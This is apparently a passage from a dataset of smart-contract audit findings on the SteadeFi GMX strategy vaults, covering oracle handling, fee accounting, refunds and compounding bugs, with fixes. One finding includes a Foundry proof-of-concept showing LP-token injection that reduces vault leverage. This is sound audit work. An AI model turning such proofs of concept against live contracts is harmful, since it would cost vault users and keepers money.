pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n -Chainlinks oracle feeds are not immutableчmediumчThat a chainlink oracle works does not mean it will be supported by chainlink in the future and keeps working, and it could also be possible that the address of the price feed changes. Therefore, it does not make sense to prevent price feed addresses from being updated, or removed, but the protocol prevents that.\\nThere is only one function inside ChainlinkARBOracle to update the price feed addresses:\\n```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n\\nAs we can see it will only allow to set the price feed ones and revert if trying to update, or remove a price feed. Therefore, if chainlink changes something, or the owner accidentally set the wrong address, or the protocol no longer wants to support a price feed, it can not be removed, or updated.чChainlinks oracle feeds are not immutable\\nRemove this line:\\n```\\nif (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n```\\nчIt is not possible to remove price feeds which are no longer supported by chainlink, or update the addresses of price feeds. This can lead to a complete DoS of the underlying token.\\nAs this feeds mapping is also the only check if it is a valid token when calling the oracle and the feed can not be removed, it will always pass this check even if the protocol no longer wishes to support this token:\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n // rest of code\\n}\\n```\\nч```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n -Unhandled DoS when access to Chainlik oracle is blockedчlowчIn certain exceptional scenarios, oracles may become temporarily unavailable. As a result, invoking the `latestRoundData` function could potentially revert without a proper error handling.\\nSteadefi documentation gives special focus on Chainlink price feed dependency, (https://github.com/Cyfrin/2023-10-SteadeFi/tree/main \"Additional Context\"). The concern stems from the potential for Chainlink multisignature entities to deliberately block the access to the price feed. In such a situation, using the `latestRoundData` function could lead to an unexpected revert.\\nIn certain extraordinary situations, Chainlink has already proactively suspended particular oracles. To illustrate, in the case of the UST collapse incident, Chainlink chose to temporarily halt the UST/ETH price oracle to prevent the propagation of incorrect data to various protocols.\\nAdditionally, this danger has been highlighted and very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our current scenario:\\n\"While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly\".\\nAs a result and taking into consideration the recommendation from OpenZepplin, it is essential to thoroughly tackle this matter within the codebase, as it directly relates to many functionalities of the system which are based on the oracle's output.\\nAnother example to check this vulnerability can be consulted in https://solodit.xyz/issues/m-18-protocols-usability-becomes-very-limited-when-access-to-chainlink-oracle-data-feed-is-blocked-code4rena-inverse-finance-inverse-finance-contest-git\\nAs previously discussed, to mitigate the potential risks related to a denial-of-service situation, it is recommended to implement a try-catch mechanism when querying Chainlink prices in the `_getChainlinkResponse` function within `ChainlinkARBOracle.sol` (link to code below). By adopting this approach, in case there's a failure in invoking the price feed, the caller contract retains control and can effectively handle any errors securely and explicitly.\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L188-L194\\n```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\nчUnhandled DoS when access to Chainlik oracle is blocked\\nWrap the invocation of the `latestRoundData()` function within a `try-catch` structure rather than directly calling it. In situations where the function call triggers a revert, the catch block can be utilized to trigger an alternative oracle or handle the error in a manner that aligns with the system's requirements.чIn the event of a malfunction or cessation of operation of a configured Oracle feed, attempting to check for the `latestRoundData` will result in a revert that must be managed manually by the system.ч```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n -`Compound()` will not work if there is only TokenA/TokenB in the trove.чmediumчThe compound() function is designed to deposit Long tokens, Short tokens, or airdropped ARB tokens to the GMX for compounding. However, it will only work if there is ARB token in the trove. If there are only Long/Short tokens in the trove without any ARB, the function will not work.\\nThe `compound()` function is intended to be called by the keeper once a day to deposit all the Long/Short or ARB tokens to the GMX for further compounding. However, the logic for depositing to the GMX is restricted by the condition that the trove must always hold an airdropped ARB token.\\nHere is the relevant code snippet from the GitHub repository:\\n```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nThe code checks if there is a positive `_tokenInAmt` (representing ARB tokens) and proceeds with the depositing and compounding logic. However, if there is no ARB token but only tokenA and tokenB in the trove, the compounding will not occur and the tokens will remain in the compoundGMX contract indefinitely.\\nIt is important to note that the airdrop of ARB tokens is a rare event, making it less likely for this condition to be met. Therefore, if there are no ARB tokens but a significant amount of tokenA and tokenB in the trove, the compounding will not take place.чTo mitigate this issue, it is important to always check if either tokenA/tokenB or ARB is present in the trove. If either of these is present, then proceed with the compound action. Otherwise, return.\\n```\\nif (_tokenInAmt > 0 || self.tokenA.balanceOf(address(this) > 0 || self.tokenB.balanceOf(address(this)) ) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\nчIf the compounding doesn't happen this could lead to the indirect loss of funds to the user and loss of gas for the keeper who always calls this function just to transfer tokens and check the balance of ARB.ч```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n -Positions may be liquidated due to incorrect implementation of Oracle logicчmediumчSteadefi checks for historical data to make sure that last price update are within maximum delya allowed and in the range of maximum % deviation allowed.\\nBut checking the historical data is incorrect according to the chainlink docs which can damage some serious logic with in the protcol\\nVault calls ChainlinkARBOracle.consult(token) to get the fair price from chainlink oracle\\n```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L62\\nwhich calls an interval function `_getPrevChainlinkResponse()` and try to fetch previous roundId price and other details\\n```\\n function _getPrevChainlinkResponse(address _feed, uint80 _currentRoundId) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _prevChainlinkResponse;\\n\\n (\\n uint80 _roundId,\\n int256 _answer,\\n /* uint256 _startedAt */,\\n uint256 _timestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).getRoundData(_currentRoundId - 1);\\n\\n _prevChainlinkResponse.roundId = _roundId;\\n _prevChainlinkResponse.answer = _answer;\\n _prevChainlinkResponse.timestamp = _timestamp;\\n _prevChainlinkResponse.success = true;\\n\\n return _prevChainlinkResponse;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L210\\nBut this is incorrect way of fetching historical data. chainlink docs say: `Oracles provide periodic data updates to the aggregators. Data feeds are updated in rounds. Rounds are identified by their roundId, which increases with each new round. This increase may not be monotonic. Knowing the roundId of a previous round allows contracts to consume historical data.\\nThe examples in this document name the aggregator roundId as aggregatorRoundId to differentiate it from the proxy roundId.` check here\\nso it is not mendatory that there will be valid data for currentRoundID-1. if there is not data for currentRooundId-1 then `_badPriceDeviation(currChainlinkResponse,PrevResponse)` check here will return true. Hence vault won't able to get the price of token at some specific timesчPositions may be liquidated due to incorrect implementation of Oracle logic\\nAs chainlink docs says. Increase in roundId may not be monotonic so loop through the previous roundID and fetch the previoous roundId data\\npseudo code\\n```\\n iterate (from roundId-1 to untill we get previous first data corressponding to roundID){\\n if(data present for roundID){\\n fetch the data and return\\n }else{\\n again iterate to get the data\\n }\\n }\\n```\\nчIn worse case keeper won't able to get the price of token so rebalancing , debt repay won't be possible leading to liquidation breaking the main important factor of protocol\\nAlmost 70% of vault action is dependent on price of a token and not getting price will make them inactive affecting net APRч```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n -Incorrect Execution Fee Refund address on Failed Deposits or withdrawals in Strategy VaultsчhighчThe Strategy Vaults within the protocol use a two-step process for handling deposits/withdrawals via GMXv2. A `createDeposit()` transaction is followed by a callback function (afterDepositExecution() or afterDepositCancellation()) based on the transaction's success. In the event of a failed deposit due to vault health checks, the execution fee refund is mistakenly sent to the depositor instead of the keeper who triggers the deposit failure process.\\nThe protocol handles the `deposit` through the `deposit` function, which uses several parameters including an execution fee that refunds any excess fees.\\n```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n\\nThe refund is intended for the message sender (msg.sender), which in the initial deposit case, is the depositor. This is established in the `GMXDeposit.deposit` function, where `self.refundee` is assigned to `msg.sender`.\\n```\\nfunction deposit(GMXTypes.Store storage self, GMXTypes.DepositParams memory dp, bool isNative) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n\\n _dc.depositKey = GMXManager.addLiquidity(self, _alp);\\n\\n self.depositCache = _dc;\\n\\n emit DepositCreated(_dc.user, _dc.depositParams.token, _dc.depositParams.amt);\\n }\\n```\\n\\nIf the deposit passes the GMX checks, the `afterDepositExecution` callback is triggered, leading to `vault.processDeposit()` to check the vault's health. A failure here updates the status to `GMXTypes.Status.Deposit_Failed`. The reversal process is then handled by the `processDepositFailure` function, which can only be called by keepers. They pay for the transaction's gas costs, including the execution fee.\\n```\\nfunction processDepositFailure(uint256 slippage, uint256 executionFee) external payable onlyKeeper {\\n GMXDeposit.processDepositFailure(_store, slippage, executionFee);\\n }\\n```\\n\\nIn `GMXDeposit.processDepositFailure`, `self.refundee` is not updated, resulting in any excess execution fees being incorrectly sent to the initial depositor, although the keeper paid for it.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n } else {\\n // Remove only the newly added LP amount\\n _rlp.lpAmt = GMXReader.lpAmt(self) - self.depositCache.healthParams.lpAmtBefore;\\n\\n // If delta strategy is Long, remove all in tokenB to make it more\\n // efficent to repay tokenB debt as Long strategy only borrows tokenB\\n if (self.delta == GMXTypes.Delta.Long) {\\n address[] memory _tokenASwapPath = new address[](1);\\n _tokenASwapPath[0] = address(self.lpToken);\\n _rlp.tokenASwapPath = _tokenASwapPath;\\n\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenB), address(self.tokenB), slippage\\n );\\n } else {\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenA), address(self.tokenB), slippage\\n );\\n }\\n\\n _rlp.executionFee = executionFee;\\n\\n // Remove liqudity\\n self.depositCache.withdrawKey = GMXManager.removeLiquidity(self, _rlp);\\n }\\n```\\n\\nThe same issue occurs in the `processWithdrawFailure` function where the excess fees will be sent to the initial user who called withdraw instead of the keeper.чThe `processDepositFailure` and `processWithdrawFailure` functions must be modified to update `self.refundee` to the current executor of the function, which, in the case of deposit or withdraw failure, is the keeper.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n\\n```\\nfunction processWithdrawFailure(\\n GMXTypes.Store storage self,\\n uint256 slippage,\\n uint256 executionFee\\n ) external {\\n GMXChecks.beforeProcessAfterWithdrawFailureChecks(self);\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\nчThis flaw causes a loss of funds for the keepers, negatively impacting the vaults. Users also inadvertently receive extra fees that are rightfully owed to the keepersч```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n -Users withdraw more assets than should when `mintFee` was called long agoчhighчThe amount of LP-tokens to withdraw is calculated at the `GMXWithdraw.withdraw` before the `mintFee` function is called. The `mintFee` function increases the `totalSupply` amount. This way users receive more tokens than should be at the current timestamp. The longer the period since the last `mintFee` was called the more excess tokens the user receives.\\nThe protocol mints vault token shares as management fees to protocol treasury with the `mintFee` function. This increases the `totalSupply` of the shares. The amount of minted fees depends on the time since the last `mintFee` call.\\n```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhile withdrawal amount of LP-token can be calculated with outdated totalSupply:\\n```\\n67 _wc.shareRatio = wp.shareAmt\\n68 * SAFE_MULTIPLIER\\n69 / IERC20(address(self.vault)).totalSupply();\\n70 _wc.lpAmt = _wc.shareRatio\\n71 * GMXReader.lpAmt(self)\\n72 / SAFE_MULTIPLIER;\\n\\n101 self.vault.mintFee();\\n```\\n\\nThe `mintFee` is called only after this calculation.чUsers withdraw more assets than should when `mintFee` was called long ago\\nConsider calling the `mintFee` before the `_wc.shareRatio` calculation.чUsers can receive excess amounts of tokens during withdrawal. Other users and the protocol management lose value of their shares.\\nTools used\\nManual Reviewч```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n -Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond ModificationчmediumчThe protocol charges a management fee based on the `feePerSecond` variable, which dictates the rate at which new vault tokens are minted as fees via the `mintFee` function. An administrative function `updateFeePerSecond` allows the owner to alter this fee rate. However, the current implementation does not account for accrued fees before the update, potentially leading to incorrect fee calculation.\\nThe contract's logic fails to account for outstanding fees at the old rate prior to updating the `feePerSecond`. As it stands, the `updateFeePerSecond` function changes the fee rate without triggering a `mintFee`, which would update the `lastFeeCollected` timestamp and mint the correct amount of fees owed up until that point.\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n\\nScenario Illustration:\\nUser A deposits, triggering `mintFee` and setting `lastFeeCollected` to the current `block.timestamp`.\\nAfter two hours without transactions, no additional `mintFee` calls occur.\\nThe owner invokes `updateFeePerSecond` to increase the fee by 10%.\\nUser B deposits, and `mintFee` now calculates fees since `lastFeeCollected` using the new, higher rate, incorrectly applying it to the period before the rate change.чInaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification\\nEnsure the fees are accurately accounted for at their respective rates by updating `lastFeeCollected` to the current timestamp prior to altering the `feePerSecond`. This can be achieved by invoking `mintFee` within the `updateFeePerSecond` function to settle all pending fees first:\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n self.vault.mintFee();\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\nчThe impact is twofold:\\nAn increased `feePerSecond` results in excessively high fees charged for the period before the update.\\nA decreased `feePerSecond` leads to lower-than-expected fees for the same duration.ч```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n -Token injection leads to unintended behavior of vaultчmediumчWhen a token is deposited/withdrawn in a vault, it happens in two steps. In the first step, some states of the vault are saved, which are partially important for the second step, and a request to deposit/withdraw is made to GMX. In the second step, GMX calls the callback function, and the vault completes the deposit/withdrawal. The problem is that one can send LP tokens to the contract between these two steps, causing the vault to behave unintentionally.\\nDeposit\\nHere is a PoC for the effects when sending lpTokens between the two steps during deposit:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. This is to show that the debt is significantly less than before\\n\\n console.log(\"debtAmtTokenBBefore: %s\", debtAmtTokenBBefore);\\n console.log(\"debtAmtTokenBAfter: %s\", debtAmtTokenBAfter);\\n }\\n}\\n```\\n\\nSince the user can withdraw their injected tokens, which they received VaultShares for, they could execute this action multiple times to further worsen the tokenB debt amount and, consequently, the leverage.\\nThe POC can be started with this command: `forge test --match-test test_POC2 -vv`\\nWithdraw\\nWhen withdrawing, LP tokens can also be injected between the two steps. This can be exploited by an attacker because he can fail the afterWithdrawChecks if he sends the same amount of lp tokens that a user wants to withdraw.\\nHere is the check that the attacker could exploit by sending enough tokens to make the lpAmt as large as it was before the withdrawal:\\n```\\nFile: GMXChecks.sol#afterWithdrawChecks\\nif (GMXReader.lpAmt(self) >= self.withdrawCache.healthParams.lpAmtBefore)\\n revert Errors.InsufficientLPTokensBurned();\\n```\\nчIn the deposit function, the depositValue should be used to determine approximately how many lpTokens GMX will be transferred to the vault. This number should then be compared to the actual received amount in processDeposit.\\nIn the case of withdrawal, after calling removeLiquidity, the lpAmt should be stored, and this should be compared to the lpAmt in the processWithdraw function to determine whether tokens were injected.чSince, if this bug is exploited during deposit, an attacker can decrease the leverage, it results in users of the vault having less leverage and lower yield.\\nWhen withdrawing, the attacker can potentially cause the withdrawal to fail, but the user doesn't lose anything and can try again.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. 